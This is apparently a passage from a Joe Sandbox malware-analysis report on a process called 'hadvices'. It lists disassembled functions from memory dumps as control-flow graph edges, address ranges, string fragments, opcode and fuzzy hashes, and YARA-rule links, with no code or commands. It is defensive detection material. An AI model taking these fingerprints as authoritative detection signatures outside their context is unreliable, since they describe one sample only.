                                                      control_flow_graph 146 177b388-177b39b 147 177b3a1-177b3aa 146->147 148 177b4da-177b4e1 146->148 149 177b4e4 147->149 150 177b3b0-177b3b4 147->150 153 177b4e9-177b4f1 149->153 151 177b3b6 150->151 152 177b3ce-177b3d5 150->152 154 177b3b9-177b3c4 151->154 152->148 155 177b3db-177b3e8 152->155 159 177b4f3-177b510 153->159 160 177b55c-177b55e 153->160 154->149 156 177b3ca-177b3cc 154->156 155->148 161 177b3ee-177b401 155->161 156->152 156->154 166 177b512-177b52a 159->166 167 177b53c 159->167 164 177b561-177b580 160->164 165 177b560 160->165 162 177b406-177b40e 161->162 163 177b403 161->163 168 177b410-177b416 162->168 169 177b47b-177b47d 162->169 163->162 171 177b587-177b664 call 1773960 call 1773480 164->171 172 177b582 164->172 165->164 181 177b533-177b536 166->181 182 177b52c-177b531 166->182 170 177b53e-177b542 167->170 168->169 174 177b418-177b41e 168->174 169->148 173 177b47f-177b485 169->173 211 177b666 171->211 212 177b66b-177b68c call 1774e20 171->212 172->171 173->148 176 177b487-177b491 173->176 174->153 177 177b424-177b43c 174->177 176->153 179 177b493-177b4ab 176->179 194 177b43e-177b444 177->194 195 177b469-177b46c 177->195 197 177b4d0-177b4d3 179->197 198 177b4ad-177b4b3 179->198 185 177b543-177b556 181->185 186 177b538-177b53a 181->186 182->170 185->160 186->166 186->167 194->153 199 177b44a-177b45e 194->199 195->149 200 177b46e-177b471 195->200 197->149 203 177b4d5-177b4d8 197->203 198->153 202 177b4b5-177b4c9 198->202 199->153 207 177b464 199->207 200->149 201 177b473-177b479 200->201 201->168 201->169 202->153 209 177b4cb 202->209 203->148 203->176 207->195 209->197 211->212 214 177b691-177b69c 212->214 215 177b6a3-177b6a7 214->215 216 177b69e 214->216 217 177b6ac-177b6b3 215->217 218 177b6a9-177b6aa 215->218 216->215 220 177b6b5 217->220 221 177b6ba-177b6c8 217->221 219 177b6cb-177b70f 218->219 225 177b775-177b78c 219->225 220->221 221->219 227 177b711-177b727 225->227 228 177b78e-177b7b3 225->228 232 177b751 227->232 233 177b729-177b735 227->233 234 177b7b5-177b7ca 228->234 235 177b7cb 228->235 238 177b757-177b774 232->238 236 177b737-177b73d 233->236 237 177b73f-177b745 233->237 234->235 241 177b7cc 235->241 239 177b74f 236->239 237->239 238->225 239->238 241->241
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 13e78da045e626b1b64eddc5d368fb2c3e58258c6d5fa2b9157aa5f7ee2f8b45
                                                      • Instruction ID: bf1440b4e3f887bd79c02f63a5fb210549955f730308c13984ca688e9437979c
                                                      • Opcode Fuzzy Hash: 13e78da045e626b1b64eddc5d368fb2c3e58258c6d5fa2b9157aa5f7ee2f8b45
                                                      • Instruction Fuzzy Hash: 88E1D575A00218CFDB14DFA9D984A9DFBB2FF89310F1580A9E919AB361DB30AD41CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177BF10 Relevance: 6.5, Strings: 5, Instructions: 208COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 244 177bf10-177bf11 245 177bf13-177bf19 244->245 246 177bf7c-177bf82 244->246 247 177bf84-177bf86 245->247 248 177bf1b-177bf40 245->248 246->247 249 177bf87-177bf93 247->249 250 177bf70-177bf7b 247->250 251 177bf47-177bf6f 248->251 252 177bf42 248->252 255 177bf95-177bfb4 call 1773960 call 1773480 249->255 256 177bff0-177c024 249->256 250->246 251->250 252->251 262 177bfb9-177bfee 255->262 263 177c026 256->263 264 177c02b-177c04c call 1774e20 256->264 262->256 263->264 267 177c051-177c05c 264->267 268 177c063-177c067 267->268 269 177c05e 267->269 270 177c06c-177c073 268->270 271 177c069-177c06a 268->271 269->268 272 177c075 270->272 273 177c07a-177c088 270->273 274 177c08b-177c0cf 271->274 272->273 273->274 278 177c135-177c14c 274->278 280 177c0d1-177c0e7 278->280 281 177c14e-177c173 278->281 285 177c111 280->285 286 177c0e9-177c0f5 280->286 288 177c175-177c18a 281->288 289 177c18b 281->289 287 177c117-177c134 285->287 290 177c0f7-177c0fd 286->290 291 177c0ff-177c105 286->291 287->278 288->289 292 177c10f 290->292 291->292 292->287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: b51effb803dfb12b9710269b4b6a74bdff1737ad232bd0db50fdd0756a2d9235
                                                      • Instruction ID: b994af874eabc2d38dcc92c3ea52919c9fa104cbbe43fd1bc22ca6bb32575f26
                                                      • Opcode Fuzzy Hash: b51effb803dfb12b9710269b4b6a74bdff1737ad232bd0db50fdd0756a2d9235
                                                      • Instruction Fuzzy Hash: 6091C374E00208CFDB15DFAAD984A9DFBF2BF89314F1480A9E819AB355DB315982CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177C1F0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 296 177c1f0-177c1f5 297 177c1f7-177c1fc 296->297 298 177c260-177c304 call 1773960 call 1773480 296->298 299 177c253-177c25d 297->299 300 177c1fe 297->300 314 177c306 298->314 315 177c30b-177c32c call 1774e20 298->315 299->298 301 177c201-177c220 300->301 302 177c200 300->302 304 177c227-177c251 301->304 305 177c222 301->305 302->301 304->299 305->304 314->315 317 177c331-177c33c 315->317 318 177c343-177c347 317->318 319 177c33e 317->319 320 177c34c-177c353 318->320 321 177c349-177c34a 318->321 319->318 322 177c355 320->322 323 177c35a-177c368 320->323 324 177c36b-177c3af 321->324 322->323 323->324 328 177c415-177c42c 324->328 330 177c3b1-177c3c7 328->330 331 177c42e-177c453 328->331 335 177c3f1 330->335 336 177c3c9-177c3d5 330->336 338 177c455-177c46a 331->338 339 177c46b 331->339 337 177c3f7-177c414 335->337 340 177c3d7-177c3dd 336->340 341 177c3df-177c3e5 336->341 337->328 338->339 342 177c3ef 340->342 341->342 342->337
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 5abf784058dfbbbbe9c958dec7276bec7ce24d32a03eb6ad0e2e050ad23b339d
                                                      • Instruction ID: bea8d358195892704fdc7582dcfb451b7ef2c8c202e69d3ed7f6cf394b50fb99
                                                      • Opcode Fuzzy Hash: 5abf784058dfbbbbe9c958dec7276bec7ce24d32a03eb6ad0e2e050ad23b339d
                                                      • Instruction Fuzzy Hash: EC81B274E04219CFEB15DFAAD884A9DFBF2BF89310F148069E809AB365DB349941CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177CA92 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 346 177ca92-177ca9c 347 177caf3-177cba4 call 1773960 call 1773480 346->347 348 177ca9e 346->348 362 177cba6 347->362 363 177cbab-177cbcc call 1774e20 347->363 349 177caa1-177cac0 348->349 350 177caa0 348->350 351 177cac7-177caf1 349->351 352 177cac2 349->352 350->349 351->347 352->351 362->363 365 177cbd1-177cbdc 363->365 366 177cbe3-177cbe7 365->366 367 177cbde 365->367 368 177cbec-177cbf3 366->368 369 177cbe9-177cbea 366->369 367->366 370 177cbf5 368->370 371 177cbfa-177cc08 368->371 372 177cc0b-177cc4f 369->372 370->371 371->372 376 177ccb5-177cccc 372->376 378 177cc51-177cc67 376->378 379 177ccce-177ccf3 376->379 383 177cc91 378->383 384 177cc69-177cc75 378->384 386 177ccf5-177cd0a 379->386 387 177cd0b 379->387 385 177cc97-177ccb4 383->385 388 177cc77-177cc7d 384->388 389 177cc7f-177cc85 384->389 385->376 386->387 390 177cc8f 388->390 389->390 390->385
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 9c3e4f7525bcbbf27d0bdfa36052fa6136799ea04329cb14df110e04fc14f02c
                                                      • Instruction ID: a91dc1bfac847f9bfdce613e8026bd0ca77e964a103622bb222a2d72a70cbb82
                                                      • Opcode Fuzzy Hash: 9c3e4f7525bcbbf27d0bdfa36052fa6136799ea04329cb14df110e04fc14f02c
                                                      • Instruction Fuzzy Hash: 8781C474E00209CFDB15DFAAD984A9DFBF2BF89301F1480A9E809AB365DB349945CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177C4D0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 394 177c4d0-177c4de 395 177c4e1-177c500 394->395 396 177c4e0 394->396 397 177c507-177c5e4 call 1773960 call 1773480 395->397 398 177c502 395->398 396->395 408 177c5e6 397->408 409 177c5eb-177c60c call 1774e20 397->409 398->397 408->409 411 177c611-177c61c 409->411 412 177c623-177c627 411->412 413 177c61e 411->413 414 177c62c-177c633 412->414 415 177c629-177c62a 412->415 413->412 417 177c635 414->417 418 177c63a-177c648 414->418 416 177c64b-177c68f 415->416 422 177c6f5-177c70c 416->422 417->418 418->416 424 177c691-177c6a7 422->424 425 177c70e-177c733 422->425 428 177c6d1 424->428 429 177c6a9-177c6b5 424->429 431 177c735-177c74a 425->431 432 177c74b 425->432 435 177c6d7-177c6f4 428->435 433 177c6b7-177c6bd 429->433 434 177c6bf-177c6c5 429->434 431->432 436 177c6cf 433->436 434->436 435->422 436->435
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: cf57290e52299de6af2e35cb9358ac62f9f0e16e807bb18e7f6c7b4c8619ef5f
                                                      • Instruction ID: cb2bd99ef33340d68d4f0d56187defeff6776550e2c391e88b6d2f80e0a3e694
                                                      • Opcode Fuzzy Hash: cf57290e52299de6af2e35cb9358ac62f9f0e16e807bb18e7f6c7b4c8619ef5f
                                                      • Instruction Fuzzy Hash: F981B274E002089FEB14DFAAD984A9DFBF2BF88310F14D069E409AB365DB345941CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177BC32 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 440 177bc32-177bc3e 441 177bc41-177bc60 440->441 442 177bc40 440->442 443 177bc67-177bd44 call 1773960 call 1773480 441->443 444 177bc62 441->444 442->441 454 177bd46 443->454 455 177bd4b-177bd6c call 1774e20 443->455 444->443 454->455 457 177bd71-177bd7c 455->457 458 177bd83-177bd87 457->458 459 177bd7e 457->459 460 177bd8c-177bd93 458->460 461 177bd89-177bd8a 458->461 459->458 463 177bd95 460->463 464 177bd9a-177bda8 460->464 462 177bdab-177bdef 461->462 468 177be55-177be6c 462->468 463->464 464->462 470 177bdf1-177be07 468->470 471 177be6e-177be93 468->471 475 177be31 470->475 476 177be09-177be15 470->476 477 177be95-177beaa 471->477 478 177beab 471->478 481 177be37-177be54 475->481 479 177be17-177be1d 476->479 480 177be1f-177be25 476->480 477->478 482 177be2f 479->482 480->482 481->468 482->481
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 28e25762e749354c534523e8a0b6c798461ae30e056102f6fcd1ebca5529ef96
                                                      • Instruction ID: b1bc6410c824bc83d04e565f022946f0fc59b3c9b0a400d3f96179d7a7d73a7c
                                                      • Opcode Fuzzy Hash: 28e25762e749354c534523e8a0b6c798461ae30e056102f6fcd1ebca5529ef96
                                                      • Instruction Fuzzy Hash: F581A074E002088FEB14DFAAD984A9DFBF2BF88311F148069E909AB365DB745981CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177C7B2 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 531 177c7b2-177c7be 532 177c7c1-177c7e0 531->532 533 177c7c0 531->533 534 177c7e7-177c8c4 call 1773960 call 1773480 532->534 535 177c7e2 532->535 533->532 545 177c8c6 534->545 546 177c8cb-177c8ec call 1774e20 534->546 535->534 545->546 548 177c8f1-177c8fc 546->548 549 177c903-177c907 548->549 550 177c8fe 548->550 551 177c90c-177c913 549->551 552 177c909-177c90a 549->552 550->549 554 177c915 551->554 555 177c91a-177c928 551->555 553 177c92b-177c96f 552->553 559 177c9d5-177c9ec 553->559 554->555 555->553 561 177c971-177c987 559->561 562 177c9ee-177ca13 559->562 566 177c9b1 561->566 567 177c989-177c995 561->567 568 177ca15-177ca2a 562->568 569 177ca2b 562->569 572 177c9b7-177c9d4 566->572 570 177c997-177c99d 567->570 571 177c99f-177c9a5 567->571 568->569 573 177c9af 570->573 571->573 572->559 573->572
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 18c2675182403841c21b7974e811c57f2988ab6d22105c8426b5c0381fa8d081
                                                      • Instruction ID: 3f97a644c857621f7698501ec1dbf8b12d84f1e0c13421ec6ad33ac38645beb6
                                                      • Opcode Fuzzy Hash: 18c2675182403841c21b7974e811c57f2988ab6d22105c8426b5c0381fa8d081
                                                      • Instruction Fuzzy Hash: 6781B374E00219DFEB54DFAAD984A9DFBF2BF88311F148069E409AB355DB349981CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01774B31 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 486 1774b31-1774b60 487 1774b67-1774c44 call 1773960 call 1773480 486->487 488 1774b62 486->488 498 1774c46 487->498 499 1774c4b-1774c69 487->499 488->487 498->499 529 1774c6c call 1774e11 499->529 530 1774c6c call 1774e20 499->530 500 1774c72-1774c7d 501 1774c84-1774c88 500->501 502 1774c7f 500->502 503 1774c8d-1774c94 501->503 504 1774c8a-1774c8b 501->504 502->501 506 1774c96 503->506 507 1774c9b-1774ca9 503->507 505 1774cac-1774cf0 504->505 511 1774d56-1774d6d 505->511 506->507 507->505 513 1774cf2-1774d08 511->513 514 1774d6f-1774d94 511->514 518 1774d32 513->518 519 1774d0a-1774d16 513->519 520 1774d96-1774dab 514->520 521 1774dac 514->521 524 1774d38-1774d55 518->524 522 1774d20-1774d26 519->522 523 1774d18-1774d1e 519->523 520->521 525 1774d30 522->525 523->525 524->511 525->524 529->500 530->500
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 50de3461691fa03481525c94551b6ed10f340d544eb3a843ff7c8856f0afec65
                                                      • Instruction ID: 7c7996507e66e892e19de04b3cc97872d3ab7b2dee90318f4a40bd6c4c9d6d7e
                                                      • Opcode Fuzzy Hash: 50de3461691fa03481525c94551b6ed10f340d544eb3a843ff7c8856f0afec65
                                                      • Instruction Fuzzy Hash: DE818074E00218DFEB14DFAAD984A9DFBF2BF88311F148069E819AB365DB345981CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01776790 Relevance: 5.4, Strings: 4, Instructions: 437COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 577 1776790-17767c6 578 17767ce-17767d4 577->578 701 17767c8 call 1776790 577->701 702 17767c8 call 17768e0 577->702 703 17767c8 call 1776168 577->703 579 17767d6-17767da 578->579 580 1776824-1776828 578->580 581 17767dc-17767e1 579->581 582 17767e9-17767f0 579->582 583 177683f-1776853 580->583 584 177682a-1776839 580->584 581->582 585 17768c6-1776903 582->585 586 17767f6-17767fd 582->586 589 177685b-1776862 583->589 705 1776855 call 17798b8 583->705 706 1776855 call 17798a8 583->706 587 1776865-177686f 584->587 588 177683b-177683d 584->588 598 1776905-177690b 585->598 599 177690e-177692e 585->599 586->580 590 17767ff-1776803 586->590 591 1776871-1776877 587->591 592 1776879-177687d 587->592 588->589 595 1776805-177680a 590->595 596 1776812-1776819 590->596 593 1776885-17768bf 591->593 592->593 594 177687f 592->594 593->585 594->593 595->596 596->585 600 177681f-1776822 596->600 598->599 605 1776935-177693c 599->605 606 1776930 599->606 600->589 609 177693e-1776949 605->609 608 1776cc4-1776ccd 606->608 610 1776cd5-1776ce1 609->610 611 177694f-1776962 609->611 616 1776964-1776972 611->616 617 1776978-1776993 611->617 616->617 622 1776c4c-1776c53 616->622 620 17769b7-17769ba 617->620 621 1776995-177699b 617->621 626 1776b14-1776b1a 620->626 627 17769c0-17769c3 620->627 623 17769a4-17769a7 621->623 624 177699d 621->624 622->608 625 1776c55-1776c57 622->625 629 17769da-17769e0 623->629 630 17769a9-17769ac 623->630 624->623 624->626 628 1776c06-1776c09 624->628 624->629 631 1776c66-1776c6c 625->631 632 1776c59-1776c5e 625->632 626->628 633 1776b20-1776b25 626->633 627->626 634 17769c9-17769cf 627->634 639 1776cd0 628->639 640 1776c0f-1776c15 628->640 641 17769e6-17769e8 629->641 642 17769e2-17769e4 629->642 635 1776a46-1776a4c 630->635 636 17769b2 630->636 631->610 637 1776c6e-1776c73 631->637 632->631 633->628 634->626 638 17769d5 634->638 635->628 645 1776a52-1776a58 635->645 636->628 643 1776c75-1776c7a 637->643 644 1776cb8-1776cbb 637->644 638->628 639->610 646 1776c17-1776c1f 640->646 647 1776c3a-1776c3e 640->647 648 17769f2-17769fb 641->648 642->648 643->639 653 1776c7c 643->653 644->639 652 1776cbd-1776cc2 644->652 654 1776a5e-1776a60 645->654 655 1776a5a-1776a5c 645->655 646->610 656 1776c25-1776c34 646->656 647->622 651 1776c40-1776c46 647->651 649 1776a0e-1776a36 648->649 650 17769fd-1776a08 648->650 676 1776a3c-1776a41 649->676 677 1776b2a-1776b60 649->677 650->628 650->649 651->609 651->622 652->608 652->625 657 1776c83-1776c88 653->657 658 1776a6a-1776a81 654->658 655->658 656->617 656->647 662 1776caa-1776cac 657->662 663 1776c8a-1776c8c 657->663 669 1776a83-1776a9c 658->669 670 1776aac-1776ad3 658->670 662->639 665 1776cae-1776cb1 662->665 666 1776c8e-1776c93 663->666 667 1776c9b-1776ca1 663->667 665->644 666->667 667->610 668 1776ca3-1776ca8 667->668 668->662 672 1776c7e-1776c81 668->672 669->677 680 1776aa2-1776aa7 669->680 670->639 682 1776ad9-1776adc 670->682 672->639 672->657 676->677 683 1776b62-1776b66 677->683 684 1776b6d-1776b75 677->684 680->677 682->639 685 1776ae2-1776b0b 682->685 686 1776b85-1776b89 683->686 687 1776b68-1776b6b 683->687 684->639 688 1776b7b-1776b80 684->688 685->677 700 1776b0d-1776b12 685->700 690 1776b8b-1776b91 686->690 691 1776ba8-1776bac 686->691 687->684 687->686 688->628 690->691 692 1776b93-1776b9b 690->692 693 1776bb6-1776bd5 call 1776eb8 691->693 694 1776bae-1776bb4 691->694 692->639 696 1776ba1-1776ba6 692->696 697 1776bdb-1776bdf 693->697 694->693 694->697 696->628 697->628 698 1776be1-1776bfd 697->698 698->628 700->677 701->578 702->578 703->578 705->589 706->589
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$(oq$,q$,q
                                                      • API String ID: 0-620556200
                                                      • Opcode ID: 185d31feeb2eb9a1132fd6a624918381402e8eb54c6d2fd82de7057ae56dec3c
                                                      • Instruction ID: 84a42a40e3df0ec286ea7c453ce7d99ced4b48f97589db464401d626b2790acc
                                                      • Opcode Fuzzy Hash: 185d31feeb2eb9a1132fd6a624918381402e8eb54c6d2fd82de7057ae56dec3c
                                                      • Instruction Fuzzy Hash: FF024970A006199FEF14DFA9C984AAEFBB2FF89310F158069F515AB269D730EC41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01667550 Relevance: 4.6, Strings: 3, Instructions: 804COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 707 1667550-166757b 708 1667582-16675fa 707->708 709 166757d 707->709 711 1667970-16679cb 708->711 712 1667600-1667712 708->712 709->708 719 16679d1-1667bf6 711->719 720 1667cdb-1667ff7 711->720 742 1667714-1667720 712->742 743 166773c 712->743 799 1667c0f-1667c20 719->799 800 1667bf8-1667c0d 719->800 830 1668010-1668021 720->830 831 1667ff9-166800e 720->831 746 1667722-1667728 742->746 747 166772a-1667730 742->747 745 1667742-1667926 743->745 815 1667935-1667936 745->815 816 1667928-1667934 745->816 750 166773a 746->750 747->750 750->745 806 1667c21-1667c99 799->806 800->806 825 1667ca0-1667cda 806->825 815->711 816->815 825->720 834 1668022-1668106 830->834 831->834 844 166810c-16683d7 834->844 845 16683d8-16683e0 834->845 844->845
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq$p@q
                                                      • API String ID: 0-1517855525
                                                      • Opcode ID: 346a047af7ca71335e63075121a3c007e3a93bbc97e86cd6765b5d363e59fb94
                                                      • Instruction ID: 10c155802489507ae2911425b7b42a98ee91819a70116bc7642a17e0e1bba3b5
                                                      • Opcode Fuzzy Hash: 346a047af7ca71335e63075121a3c007e3a93bbc97e86cd6765b5d363e59fb94
                                                      • Instruction Fuzzy Hash: 3882AF74A012298FDB65DF25C994BD9BBB2FF89301F1081E9D909A7364CB35AE81CF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177B552 Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 878 177b552-177b55e 880 177b561-177b580 878->880 881 177b560 878->881 882 177b587-177b664 call 1773960 call 1773480 880->882 883 177b582 880->883 881->880 893 177b666 882->893 894 177b66b-177b68c call 1774e20 882->894 883->882 893->894 896 177b691-177b69c 894->896 897 177b6a3-177b6a7 896->897 898 177b69e 896->898 899 177b6ac-177b6b3 897->899 900 177b6a9-177b6aa 897->900 898->897 902 177b6b5 899->902 903 177b6ba-177b6c8 899->903 901 177b6cb-177b70f 900->901 907 177b775-177b78c 901->907 902->903 903->901 909 177b711-177b727 907->909 910 177b78e-177b7b3 907->910 914 177b751 909->914 915 177b729-177b735 909->915 916 177b7b5-177b7ca 910->916 917 177b7cb 910->917 920 177b757-177b774 914->920 918 177b737-177b73d 915->918 919 177b73f-177b745 915->919 916->917 923 177b7cc 917->923 921 177b74f 918->921 919->921 920->907 921->920 923->923
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$PHq$PHq
                                                      • API String ID: 0-1671885247
                                                      • Opcode ID: 9fae4aaad278d81803c5388e948326edbbffd944ad7a8ccc661a997e37c8afba
                                                      • Instruction ID: 3a0527462bca5e5d86cd6432257cb0be900d68b522c4b216c5b7072f06b063a3
                                                      • Opcode Fuzzy Hash: 9fae4aaad278d81803c5388e948326edbbffd944ad7a8ccc661a997e37c8afba
                                                      • Instruction Fuzzy Hash: 5F618274E006089FEF18DFAAD984A9DFBF2BF88310F14806AE519AB365DB345941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017798B8 Relevance: 3.3, Strings: 2, Instructions: 844COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$4'q
                                                      • API String ID: 0-1336004174
                                                      • Opcode ID: d3850fc84615699070ae30c2ea0c92422092d5270620395a8d84e5844df65765
                                                      • Instruction ID: 54a339fc3c53177cd29b5b2e2e91c62b03d24477d8831df34bb2494c4c2516e6
                                                      • Opcode Fuzzy Hash: d3850fc84615699070ae30c2ea0c92422092d5270620395a8d84e5844df65765
                                                      • Instruction Fuzzy Hash: 9172BD30A00219DFDF15CF68C984AAEFBF2FF89310F198559E9059B2A5D731E981CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166793B Relevance: 3.1, Strings: 2, Instructions: 571COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1359 166793b-16679cb 1367 16679d1-1667bf6 1359->1367 1368 1667cdb-1667ff7 1359->1368 1418 1667c0f-1667c20 1367->1418 1419 1667bf8-1667c0d 1367->1419 1440 1668010-1668021 1368->1440 1441 1667ff9-166800e 1368->1441 1423 1667c21-1667c99 1418->1423 1419->1423 1435 1667ca0-1667cda 1423->1435 1435->1368 1444 1668022-1668106 1440->1444 1441->1444 1454 166810c-16683d7 1444->1454 1455 16683d8-16683e0 1444->1455 1454->1455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq
                                                      • API String ID: 0-2938103587
                                                      • Opcode ID: efb83d8c4195c666e5fcc7a0658508c6a07c4e36490be9b6a08ba96507dcf90d
                                                      • Instruction ID: 45de4112f631be24f9bc79799084bb72bfdfa6830629cd83d625a82635d0a266
                                                      • Opcode Fuzzy Hash: efb83d8c4195c666e5fcc7a0658508c6a07c4e36490be9b6a08ba96507dcf90d
                                                      • Instruction Fuzzy Hash: 0252AB74A01229CFDB64DF65C994BD9BBB2FB89301F1085E9D809A7364CB35AE81CF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01667939 Relevance: 3.1, Strings: 2, Instructions: 568COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
